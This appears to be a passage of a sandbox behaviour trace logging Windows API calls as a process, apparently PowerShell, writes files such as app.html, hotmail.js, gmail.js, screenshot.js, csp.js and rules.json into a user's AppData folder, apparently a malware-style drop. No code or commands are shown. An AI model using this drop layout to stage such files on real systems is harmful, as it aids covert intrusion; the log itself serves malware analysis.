[0164.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.889] EtwEventActivityIdControl () returned 0x0 [0164.889] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\app.html", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x32 [0164.889] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\app.html", nBufferLength=0x32, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\app.html", lpFilePart=0x0) returned 0x31 [0164.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.890] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\app.html" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\app.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.892] GetFileType (hFile=0x36c) returned 0x1 [0164.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.892] GetFileType (hFile=0x36c) returned 0x1 [0164.892] WriteFile (in: hFile=0x36c, lpBuffer=0x27c2980*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x27c2980*, lpNumberOfBytesWritten=0x5a0e75c*=0xe3, lpOverlapped=0x0) returned 1 [0164.893] CloseHandle (hObject=0x36c) returned 1 [0164.898] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.898] EtwEventActivityIdControl () returned 0x0 [0164.898] EtwEventActivityIdControl () returned 0x0 [0164.898] EtwEventActivityIdControl () returned 0x0 [0164.898] EtwEventActivityIdControl () returned 0x0 [0164.899] EtwEventActivityIdControl () returned 0x0 [0164.899] EtwEventActivityIdControl () returned 0x0 [0164.899] EtwEventActivityIdControl () returned 0x0 [0164.900] EtwEventActivityIdControl () returned 0x0 [0164.900] EtwEventActivityIdControl () returned 0x0 [0164.900] EtwEventActivityIdControl () returned 0x0 [0164.900] EtwEventActivityIdControl () returned 0x0 [0164.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.904] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\mails"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83d16fe0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83d16fe0, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83d16fe0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0164.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.904] EtwEventActivityIdControl () returned 0x0 [0164.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.904] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails\\hotmail.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\mails\\hotmail.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.905] GetFileType (hFile=0x36c) returned 0x1 [0164.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.905] GetFileType (hFile=0x36c) returned 0x1 [0164.905] WriteFile (in: hFile=0x36c, lpBuffer=0x6c73538*, nNumberOfBytesToWrite=0x3b641, lpNumberOfBytesWritten=0x5a0e788, lpOverlapped=0x0 | out: lpBuffer=0x6c73538*, lpNumberOfBytesWritten=0x5a0e788*=0x3b641, lpOverlapped=0x0) returned 1 [0164.911] CloseHandle (hObject=0x36c) returned 1 [0164.915] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.915] EtwEventActivityIdControl () returned 0x0 [0164.915] EtwEventActivityIdControl () returned 0x0 [0164.915] EtwEventActivityIdControl () returned 0x0 [0164.917] EtwEventActivityIdControl () returned 0x0 [0164.917] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.918] EtwEventActivityIdControl () returned 0x0 [0164.918] EtwEventActivityIdControl () returned 0x0 [0164.918] EtwEventActivityIdControl () returned 0x0 [0164.919] EtwEventActivityIdControl () returned 0x0 [0164.920] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.920] EtwEventActivityIdControl () returned 0x0 [0164.920] EtwEventActivityIdControl () returned 0x0 [0164.920] EtwEventActivityIdControl () returned 0x0 [0164.927] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions")) returned 0x2010 [0164.927] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0164.927] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", lpFilePart=0x0) returned 0x36 [0164.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.927] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839d11a0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83dfb820, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83dfb820, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0164.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.927] EtwEventActivityIdControl () returned 0x0 [0164.928] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\screenshot.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0164.928] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\screenshot.js", nBufferLength=0x45, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\screenshot.js", lpFilePart=0x0) returned 0x44 [0164.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.928] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\screenshot.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\screenshot.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.929] GetFileType (hFile=0x36c) returned 0x1 [0164.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.929] GetFileType (hFile=0x36c) returned 0x1 [0164.929] WriteFile (in: hFile=0x36c, lpBuffer=0x27e7354*, nNumberOfBytesToWrite=0xcd, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x27e7354*, lpNumberOfBytesWritten=0x5a0e75c*=0xcd, lpOverlapped=0x0) returned 1 [0164.930] CloseHandle (hObject=0x36c) returned 1 [0164.933] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.933] EtwEventActivityIdControl () returned 0x0 [0164.933] EtwEventActivityIdControl () returned 0x0 [0164.933] EtwEventActivityIdControl () returned 0x0 [0164.935] EtwEventActivityIdControl () returned 0x0 [0164.935] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.936] EtwEventActivityIdControl () returned 0x0 [0164.936] EtwEventActivityIdControl () returned 0x0 [0164.936] EtwEventActivityIdControl () returned 0x0 [0164.943] EtwEventActivityIdControl () returned 0x0 [0164.944] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.944] EtwEventActivityIdControl () returned 0x0 [0164.944] EtwEventActivityIdControl () returned 0x0 [0164.944] EtwEventActivityIdControl () returned 0x0 [0164.952] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions")) returned 0x2010 [0164.953] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0164.953] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", lpFilePart=0x0) returned 0x36 [0164.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.953] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839d11a0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83e93da0, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83e93da0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0164.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.953] EtwEventActivityIdControl () returned 0x0 [0164.953] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\csp.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0164.954] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\csp.js", nBufferLength=0x3e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\csp.js", lpFilePart=0x0) returned 0x3d [0164.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.954] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\csp.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\csp.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0164.954] GetFileType (hFile=0x36c) returned 0x1 [0164.955] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0164.955] GetFileType (hFile=0x36c) returned 0x1 [0164.955] WriteFile (in: hFile=0x36c, lpBuffer=0x261908c*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x261908c*, lpNumberOfBytesWritten=0x5a0e75c*=0xd0, lpOverlapped=0x0) returned 1 [0164.956] CloseHandle (hObject=0x36c) returned 1 [0164.959] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.959] EtwEventActivityIdControl () returned 0x0 [0164.959] EtwEventActivityIdControl () returned 0x0 [0164.959] EtwEventActivityIdControl () returned 0x0 [0164.961] EtwEventActivityIdControl () returned 0x0 [0164.962] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.962] EtwEventActivityIdControl () returned 0x0 [0164.962] EtwEventActivityIdControl () returned 0x0 [0164.962] EtwEventActivityIdControl () returned 0x0 [0164.964] EtwEventActivityIdControl () returned 0x0 [0164.964] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0164.965] EtwEventActivityIdControl () returned 0x0 [0164.965] EtwEventActivityIdControl () returned 0x0 [0164.965] EtwEventActivityIdControl () returned 0x0 [0164.997] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions")) returned 0x2010 [0164.997] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0164.997] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions", lpFilePart=0x0) returned 0x36 [0164.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0164.997] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839d11a0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83eb9f00, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83eb9f00, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0164.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0164.997] EtwEventActivityIdControl () returned 0x0 [0164.998] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\settings.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0164.998] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\settings.js", nBufferLength=0x43, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\settings.js", lpFilePart=0x0) returned 0x42 [0164.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0164.998] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\settings.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\settings.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0165.002] GetFileType (hFile=0x36c) returned 0x1 [0165.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0165.002] GetFileType (hFile=0x36c) returned 0x1 [0165.002] WriteFile (in: hFile=0x36c, lpBuffer=0x2637fd4*, nNumberOfBytesToWrite=0x1c6, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x2637fd4*, lpNumberOfBytesWritten=0x5a0e75c*=0x1c6, lpOverlapped=0x0) returned 1 [0165.020] CloseHandle (hObject=0x36c) returned 1 [0165.025] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.027] EtwEventActivityIdControl () returned 0x0 [0165.027] EtwEventActivityIdControl () returned 0x0 [0165.027] EtwEventActivityIdControl () returned 0x0 [0165.030] EtwEventActivityIdControl () returned 0x0 [0165.030] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.031] EtwEventActivityIdControl () returned 0x0 [0165.031] EtwEventActivityIdControl () returned 0x0 [0165.031] EtwEventActivityIdControl () returned 0x0 [0165.098] EtwEventActivityIdControl () returned 0x0 [0165.099] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.099] EtwEventActivityIdControl () returned 0x0 [0165.099] EtwEventActivityIdControl () returned 0x0 [0165.099] EtwEventActivityIdControl () returned 0x0 [0165.105] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default")) returned 0x2010 [0165.105] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x29 [0165.106] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", nBufferLength=0x29, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default", lpFilePart=0x0) returned 0x28 [0165.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0165.106] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8368b360, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83e21980, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83e21980, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0165.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0165.106] EtwEventActivityIdControl () returned 0x0 [0165.106] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\rules.json", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x34 [0165.106] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\rules.json", nBufferLength=0x34, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\rules.json", lpFilePart=0x0) returned 0x33 [0165.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0165.107] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\rules.json" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\rules.json"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0165.107] GetFileType (hFile=0x36c) returned 0x1 [0165.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0165.108] GetFileType (hFile=0x36c) returned 0x1 [0165.108] WriteFile (in: hFile=0x36c, lpBuffer=0x2654a04*, nNumberOfBytesToWrite=0x26a, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x2654a04*, lpNumberOfBytesWritten=0x5a0e75c*=0x26a, lpOverlapped=0x0) returned 1 [0165.109] CloseHandle (hObject=0x36c) returned 1 [0165.111] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.111] EtwEventActivityIdControl () returned 0x0 [0165.111] EtwEventActivityIdControl () returned 0x0 [0165.111] EtwEventActivityIdControl () returned 0x0 [0165.112] EtwEventActivityIdControl () returned 0x0 [0165.113] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.113] EtwEventActivityIdControl () returned 0x0 [0165.113] EtwEventActivityIdControl () returned 0x0 [0165.113] EtwEventActivityIdControl () returned 0x0 [0165.115] EtwEventActivityIdControl () returned 0x0 [0165.115] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.116] EtwEventActivityIdControl () returned 0x0 [0165.116] EtwEventActivityIdControl () returned 0x0 [0165.116] EtwEventActivityIdControl () returned 0x0 [0165.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0165.120] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x839d11a0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83f2c320, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83f2c320, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0165.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0165.121] EtwEventActivityIdControl () returned 0x0 [0165.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0165.121] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\functions\\utils.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\functions\\utils.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0165.122] GetFileType (hFile=0x36c) returned 0x1 [0165.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0165.122] GetFileType (hFile=0x36c) returned 0x1 [0165.122] WriteFile (in: hFile=0x36c, lpBuffer=0x266796c*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x5a0e75c, lpOverlapped=0x0 | out: lpBuffer=0x266796c*, lpNumberOfBytesWritten=0x5a0e75c*=0x51, lpOverlapped=0x0) returned 1 [0165.123] CloseHandle (hObject=0x36c) returned 1 [0165.129] EtwEventActivityIdControl () returned 0x0 [0165.129] EtwEventActivityIdControl () returned 0x0 [0165.129] EtwEventActivityIdControl () returned 0x0 [0165.130] EtwEventActivityIdControl () returned 0x0 [0165.131] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.131] EtwEventActivityIdControl () returned 0x0 [0165.131] EtwEventActivityIdControl () returned 0x0 [0165.131] EtwEventActivityIdControl () returned 0x0 [0165.133] EtwEventActivityIdControl () returned 0x0 [0165.133] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e388, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.133] EtwEventActivityIdControl () returned 0x0 [0165.133] EtwEventActivityIdControl () returned 0x0 [0165.133] EtwEventActivityIdControl () returned 0x0 [0165.140] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\mails")) returned 0x2010 [0165.140] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0165.140] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails", nBufferLength=0x33, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails", lpFilePart=0x0) returned 0x32 [0165.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e244) returned 1 [0165.140] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\mails"), fInfoLevelId=0x0, lpFileInformation=0x5a0e508 | out: lpFileInformation=0x5a0e508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83d16fe0, ftCreationTime.dwHighDateTime=0x1d94ef4, ftLastAccessTime.dwLowDateTime=0x83e47ae0, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x83e47ae0, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0165.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e240) returned 1 [0165.140] EtwEventActivityIdControl () returned 0x0 [0165.141] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails\\gmail.js", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0165.141] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails\\gmail.js", nBufferLength=0x3c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails\\gmail.js", lpFilePart=0x0) returned 0x3b [0165.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e6d8) returned 1 [0165.141] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Default\\src\\mails\\gmail.js" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\default\\src\\mails\\gmail.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0165.142] GetFileType (hFile=0x36c) returned 0x1 [0165.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e6d4) returned 1 [0165.142] GetFileType (hFile=0x36c) returned 0x1 [0165.142] WriteFile (in: hFile=0x36c, lpBuffer=0x33d0a50*, nNumberOfBytesToWrite=0x460f5, lpNumberOfBytesWritten=0x5a0e788, lpOverlapped=0x0 | out: lpBuffer=0x33d0a50*, lpNumberOfBytesWritten=0x5a0e788*=0x460f5, lpOverlapped=0x0) returned 1 [0165.153] CloseHandle (hObject=0x36c) returned 1 